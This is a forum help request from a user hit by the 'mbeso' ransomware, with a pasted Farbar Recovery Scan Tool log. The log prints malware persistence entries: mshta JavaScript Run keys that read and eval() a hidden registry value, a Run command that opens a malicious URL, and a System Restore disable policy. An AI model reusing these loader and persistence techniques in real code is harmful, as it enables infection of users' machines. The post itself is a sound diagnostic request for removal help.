mbeso Ransomware. Some files are encrypted


This topic is locked. 19 replies to this topic

#1 snapjaw (Members, 72 posts)

Posted 10 November 2015 - 12:45 PM

Hi, my computer was acting slow and I accidentally hit Yes on this pop-up.

[screenshot: a5fbic.jpg]

The only thing I noticed afterwards is that some icons on my desktop turned into a white sheet of paper. I turned my computer off and on by hitting the power switch on the back, and when it restarted to the desktop this text file opened by itself.

[screenshot: 91f347.jpg]

I don't know if you can see it, but the txt file is called howto_recover_file_mbeso. Now I can't open Task Manager, my System Restore points are gone, and Malwarebytes won't run. The only files I have noticed are encrypted are text files; they have a .ccc extension now. Music and video files still play, and the internet still works. Here are my PC specs and a FRST log.

 

My PC Specs
Windows 7 Home Premium 64 bit
Intel Core i5-2500K CPU @ 3.30 GHz
4 GB RAM
Evga Geforce GTX 580

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:07-11-2015
Ran by KW (administrator) on KEVIN-PC (10-11-2015 11:19:15)
Running from C:\Users\KW\Desktop
Loaded Profiles: KW (Available Profiles: KW)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\NvXDSync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
() C:\ProgramData\igfxCUIService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
() C:\Program Files (x86)\NETGEAR\WNDA3100v2\WNDA3100v2.exe
() C:\Users\KW\AppData\Roaming\popry-a.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
() C:\Program Files (x86)\NETGEAR\WNDA3100v2\WifiSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(D-Link Corp.) C:\Program Files (x86)\D-Link\DWA-556 revA\wirelesscm.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Disc Soft Ltd) C:\Users\KW\Downloads\Applications\Daemon Tools\Daemon Tools Lite 10\DAEMON Tools Lite\DiscSoftBusService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\consent.exe
(Microsoft Corporation) C:\Windows\System32\PresentationHost.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil64_16_0_0_235_ActiveX.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7284328 2011-08-30] (Realtek Semiconductor)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2465088 2014-11-17] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM-x32\...\Run: [codec Settings UAC Manager] => C:\Windows\SysWOW64\C2MP\CodecUACManager.exe [60432 2015-03-05] ()
HKLM-x32\...\Run: [Babakan] => cmd.exe /k if %date:~6,4%%date:~3,2%%date:~0,2% LEQ 20131027 (exit) else (start hxxp://dinoraptzor.org && exit)
HKLM-x32\...\Run: [qewr2342] => C:\Users\KW\AppData\Roaming\popry-a.exe [466944 2015-11-09] ()
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <===== ATTENTION
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2012-09-11] (Google Inc.)
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [DAEMON Tools Lite Automount] => C:\Users\KW\Downloads\Applications\Daemon Tools\Daemon Tools Lite 10\DAEMON Tools Lite\DTAgent.exe [4468056 2015-06-18] (Disc Soft Ltd)
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [MSConfig] => C:\Users\KW\nsrulzde.exe [42729472 2015-11-09] (Intrusion falcon)
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [qewr2342] => C:\Users\KW\AppData\Roaming\popry-a.exe [466944 2015-11-09] ()
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [igfxCUIService] => C:\ProgramData\igfxCUIService.exe [4096 2015-11-09] ()
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [**7fae0a5e<*>] => mshta javascript:UAD0hTWO7="4FeVa";zV49=new%20ActiveXObject("WScript.Shell");AmhGb2JU="IVvGbj5Im0";RFfX53=zV49.RegRead("HKCU\\software\\e73cf62062\\8b3a4602");JroDWU94GX="Ym8vbyTbb0";eval(RFfX53);Ou4b (the data entry has 13 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [**ca7e5942<*>] => mshta javascript:spA4CiQ="RkJDrEB";I66o=new%20ActiveXObject("WScript.Shell");skS8mNl2="GasX";he1Qt7=I66o.RegRead("HKCU\\software\\e73cf62062\\8b3a4602");kaUc5Rfu="6YqP6NSb";eval(he1Qt7);u0D0pmrf="e"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\MountPoints2: D - D:\Setup.exe
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\PhotoScreensaver.scr [477696 2010-11-20] (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk [2015-03-25]
ShortcutTarget: CodecPackTrayMenu.lnk -> C:\Windows\SysWOW64\C2MP\TrayMenu.exe (No File)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNDA3100v2 Smart Wizard.lnk [2012-02-17]
ShortcutTarget: NETGEAR WNDA3100v2 Smart Wizard.lnk -> C:\Program Files (x86)\NETGEAR\WNDA3100v2\WNDA3100v2.exe ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Wireless Connection Manager.lnk [2012-03-04]
ShortcutTarget: Wireless Connection Manager.lnk -> C:\Program Files (x86)\D-Link\DWA-556 revA\wirelesscm.exe (D-Link Corp.)
Startup: C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.html [2015-11-09] ()
Startup: C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.txt [2015-11-09] ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: 127.0.0.1 idnet.ua-corp.com
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{40DEB06D-8BDB-4844-8B44-A2B8ED497A17}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{5722F3C1-0AE8-42B0-B73C-1053D96A8EAE}: [DhcpNameServer] 24.93.41.125 24.93.41.126
Tcpip\..\Interfaces\{72ACAD53-266F-42D0-ADF7-56D931A839D2}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{A4BAD1D7-7354-4AAA-8E6E-E64CC99E7BDE}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{ACD59940-2998-4055-898C-AA9DC8833298}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{FEC4A0D6-8BDB-4D47-A335-9213828537F7}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.magicmicro.com
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\.DEFAULT -> {483830EE-A4CD-4b71-B0A3-3D82E62A6909} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1995585355-2568222046-1999612799-1002 -> {028D7B20-77F6-433E-8AF4-E0206FE13E1E} URL = hxxps://www.flickr.com/search/?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1995585355-2568222046-1999612799-1002 -> {1990B8FA-C6B6-42DE-87AE-643474758F40} URL = hxxps://delicious.com/search?p={searchTerms}
SearchScopes: HKU\S-1-5-21-1995585355-2568222046-1999612799-1002 -> {DD280844-55BA-407D-B945-EC0B1176E144} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_25\bin\ssv.dll [2014-12-14] (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-09-22] (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_25\bin\jp2ssv.dll [2014-12-14] (Oracle Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\ssv.dll [2014-12-14] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-09-22] (Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\jp2ssv.dll [2014-12-14] (Oracle Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-09-22] (Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-09-22] (Google Inc.)
Toolbar: HKU\S-1-5-21-1995585355-2568222046-1999612799-1002 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-09-22] (Google Inc.)

FireFox:
========
FF ProfilePath: C:\Users\KW\AppData\Roaming\Mozilla\Firefox\Profiles\kfpcf5c9.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_16_0_0_235.dll [2014-12-14] ()
FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-12-14] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-12-14] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_235.dll [2014-12-14] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-12-14] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-12-14] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-08-06] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-08-06] (NVIDIA Corporation)
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Users\KW\Downloads\Applications\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-19] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-19] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-09-26] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1995585355-2568222046-1999612799-1002: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\KW\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-09-05] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-1995585355-2568222046-1999612799-1002: electronicarts.com/GameFacePlugin -> C:\Users\KW\AppData\Roaming\Electronic Arts\Game Face\npGameFacePlugin.dll [2012-12-20] (Electronic Arts)
FF SearchPlugin: C:\Users\KW\AppData\Roaming\Mozilla\Firefox\Profiles\kfpcf5c9.default\searchplugins\howto_recover_file_mbeso.html [2015-11-09]
FF SearchPlugin: C:\Users\KW\AppData\Roaming\Mozilla\Firefox\Profiles\kfpcf5c9.default\searchplugins\howto_recover_file_mbeso.txt [2015-11-09]

Chrome:
=======
CHR HomePage: Default -> hxxps://www.google.com/
CHR Profile: C:\Users\KW\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (WOT: Web of Trust, Website Reputation Ratings) - C:\Users\KW\AppData\Local\Google\Chrome\User Data\Default\Extensions\bhmmomiinigofkjcapegjjndpbikblnp [2015-11-09]
CHR Extension: (Chrome Web Store Payments) - C:\Users\KW\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-09]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77128 2015-01-19] (Apple Inc.)
R3 Disc Soft Lite Bus Service; C:\Users\KW\Downloads\Applications\Daemon Tools\Daemon Tools Lite 10\DAEMON Tools Lite\DiscSoftBusService.exe [1268568 2015-06-18] (Disc Soft Ltd)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [6677048 2015-07-06] (GOG.com)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1149760 2014-11-17] (NVIDIA Corporation)
S2 MBAMScheduler; C:\Users\KW\Downloads\Applications\Malwarebytes Anti-Malware second try\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation)
S2 MBAMService; C:\Users\KW\Downloads\Applications\Malwarebytes Anti-Malware second try\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1796928 2014-11-17] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [19821376 2014-11-17] (NVIDIA Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [1931632 2015-04-12] (Electronic Arts)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76152 2015-04-12] ()
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)
R2 WSWNDA3100; C:\Program Files (x86)\NETGEAR\WNDA3100v2\WifiSvc.exe [272864 2010-08-19] ()
S3 GalaxyClientService; "C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe" [X]
S2 PinnacleUpdateSvc; C:\Users\KW\Downloads\Games\Install Directory\Mass Effect 3 360 Pinnacle Game Profiler\pinnacle_updater.exe [X]
S3 Secunia PSI Agent; "C:\Program Files (x86)\Secunia\PSI\PSIA.exe" --start-service [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Corporation)
S3 AR5416; C:\Windows\System32\DRIVERS\athwx.sys [2065824 2010-07-20] (Atheros Communications, Inc.)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2015-06-30] (Disc Soft Ltd)
S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2014-12-05] ()
S3 MAUSBFASTTRACK; C:\Windows\System32\DRIVERS\MAudioFastTrack.sys [187912 2010-12-07] (Avid Technology, Inc.)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-05-12] (Malwarebytes Corporation)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [122584 2015-11-09] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-05-12] (Malwarebytes Corporation)
S3 MTsensor; C:\Windows\system32\drivers\ASACPI.sys [8192 2005-03-29] ()
S3 NPF; C:\Windows\System32\DRIVERS\npf.sys [47632 2010-02-03] (CACE Technologies, Inc.)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [20800 2014-11-17] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [38216 2014-10-03] (NVIDIA Corporation)
S3 PSI; C:\Windows\System32\DRIVERS\psi_mf_amd64.sys [18456 2014-11-28] (Secunia)
R3 ScpVBus; C:\Windows\System32\DRIVERS\ScpVBus.sys [39168 2013-05-19] (Scarlet.Crush Productions)
R3 zttap200; C:\Windows\System32\DRIVERS\zttap200.sys [31896 2014-03-05] ()
S3 cleanhlp; \??\C:\Users\KW\Downloads\Applications\Emirson Emergency Kit\Emirson Emergency Kit (Extracted Files)\bin\cleanhlp64.sys [X]
S3 NvStUSB; \SystemRoot\system32\drivers\nvstusb.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-11-10 11:19 - 2015-11-10 11:20 - 00020757 _____ C:\Users\KW\Desktop\FRST.txt
2015-11-10 11:17 - 2015-11-10 11:19 - 00000000 ____D C:\FRST
2015-11-10 11:17 - 2015-11-10 11:17 - 02198528 _____ (Farbar) C:\Users\KW\Desktop\FRST64.exe
2015-11-10 11:12 - 2015-11-10 11:12 - 00000253 _____ C:\Users\KW\Documents\recover_file_dnxuiowmj.txt
2015-11-09 20:39 - 2015-11-09 20:39 - 00000253 _____ C:\Users\KW\Documents\recover_file_ihgmakdix.txt
2015-11-09 20:19 - 2015-11-09 20:19 - 00005701 _____ C:\Users\KW\Documents\howto_recover_file_mbeso.html
2015-11-09 20:19 - 2015-11-09 20:19 - 00002561 _____ C:\Users\KW\Documents\howto_recover_file_mbeso.txt
2015-11-09 20:16 - 2015-11-09 20:16 - 00005701 _____ C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\howto_recover_file_mbeso.html
2015-11-09 20:16 - 2015-11-09 20:16 - 00005701 _____ C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\howto_recover_file_mbeso.html
2015-11-09 20:16 - 2015-11-09 20:16 - 00005701 _____ C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.html
2015-11-09 20:16 - 2015-11-09 20:16 - 00005701 _____ C:\Users\KW\AppData\howto_recover_file_mbeso.html
2015-11-09 20:16 - 2015-11-09 20:16 - 00002561 _____ C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\howto_recover_file_mbeso.txt
2015-11-09 20:16 - 2015-11-09 20:16 - 00002561 _____ C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\howto_recover_file_mbeso.txt
2015-11-09 20:16 - 2015-11-09 20:16 - 00002561 _____ C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.txt
2015-11-09 20:16 - 2015-11-09 20:16 - 00002561 _____ C:\Users\KW\AppData\howto_recover_file_mbeso.txt
2015-11-09 20:13 - 2015-11-09 20:13 - 00005701 _____ C:\Users\KW\AppData\LocalLow\howto_recover_file_mbeso.html
2015-11-09 20:13 - 2015-11-09 20:13 - 00002561 _____ C:\Users\KW\AppData\LocalLow\howto_recover_file_mbeso.txt
2015-11-09 18:37 - 2015-11-09 20:12 - 00005701 _____ C:\Users\KW\AppData\Local\howto_recover_file_mbeso.html
2015-11-09 18:37 - 2015-11-09 20:12 - 00002561 _____ C:\Users\KW\AppData\Local\howto_recover_file_mbeso.txt
2015-11-09 18:37 - 2015-11-09 18:37 - 00005701 _____ C:\Users\KW\AppData\Local\Apps\howto_recover_file_mbeso.html
2015-11-09 18:37 - 2015-11-09 18:37 - 00002561 _____ C:\Users\KW\AppData\Local\Apps\howto_recover_file_mbeso.txt
2015-11-09 18:36 - 2015-11-09 18:37 - 00005701 _____ C:\ProgramData\howto_recover_file_mbeso.html
2015-11-09 18:36 - 2015-11-09 18:37 - 00002561 _____ C:\ProgramData\howto_recover_file_mbeso.txt
2015-11-09 18:36 - 2015-11-09 18:36 - 00005701 _____ C:\Users\Public\Documents\howto_recover_file_mbeso.html
2015-11-09 18:36 - 2015-11-09 18:36 - 00002561 _____ C:\Users\Public\Documents\howto_recover_file_mbeso.txt
2015-11-09 18:30 - 2015-11-09 18:30 - 00004096 _____ C:\ProgramData\igfxCUIService.exe
2015-11-09 18:29 - 2015-11-09 18:29 - 42729472 ____H (Intrusion falcon) C:\Users\KW\nsrulzde.exe
2015-11-09 18:29 - 2015-11-09 18:29 - 00466944 _____ C:\Users\KW\AppData\Roaming\popry-a.exe
2015-11-09 18:29 - 2015-11-09 18:29 - 00004096 _____ C:\ProgramData\IntelCpHeciSvc.dll
2015-11-09 18:29 - 2015-11-09 18:29 - 00000253 _____ C:\Users\KW\Documents\recover_file_foogsogfe.txt
2015-11-09 18:04 - 2015-11-09 20:13 - 00000000 ____D C:\Users\KW\AppData\LocalLow\uTorrent
2015-11-09 18:03 - 2015-11-09 18:03 - 00018568 _____ C:\Users\KW\Downloads\[kat.cr]animerg.naruto.shippuden.season.13.dub.phr0sty.torrent
2015-11-09 18:03 - 2015-11-09 18:03 - 00018568 _____ C:\Users\KW\Downloads\[kat.cr]animerg.naruto.shippuden.season.13.dub.phr0sty (1).torrent
2015-11-07 16:39 - 2015-11-07 16:39 - 00136961 _____ C:\Users\KW\Downloads\[kat.cr]naruto.shippuden.season.1.12.episode.1.275.dual.audio.eng.jap.torrent
2015-11-05 22:29 - 2015-11-05 22:29 - 00015688 _____ C:\Users\KW\Downloads\[kat.cr]m.ni.naruto.shippuden.season.10.ep.197.221.720p.dual.audio.english.softsub.torrent
2015-11-05 18:30 - 2015-11-05 18:30 - 00023537 _____ C:\Users\KW\Downloads\[kat.cr]m.ni.naruto.shippuden.720p.season.9.ep.176.196.english.dubbed.subbed.torrent
2015-11-04 20:03 - 2015-11-04 20:03 - 00002503 _____ C:\Users\Public\Desktop\NARUTO SHIPPUDEN Ultimate Ninja STORM 3 Full Burst.lnk
2015-11-03 19:07 - 2015-11-03 19:07 - 00063177 _____ C:\Users\KW\Downloads\[kat.cr]m.ni.naruto.shippuden.english.dubbed.720p.season.1.8.ep.1.175.torrent
2015-11-01 17:16 - 2015-11-01 17:16 - 00017323 _____ C:\Users\KW\Downloads\[kat.cr]naruto.shippuden.season.6.720p.english.dub.ep.113.143.torrent
2015-11-01 15:44 - 2015-11-01 15:44 - 00089910 _____ C:\Users\KW\Downloads\[kat.cr]the.knick.s02e03.720p.hdtv.x264.killers.torrent
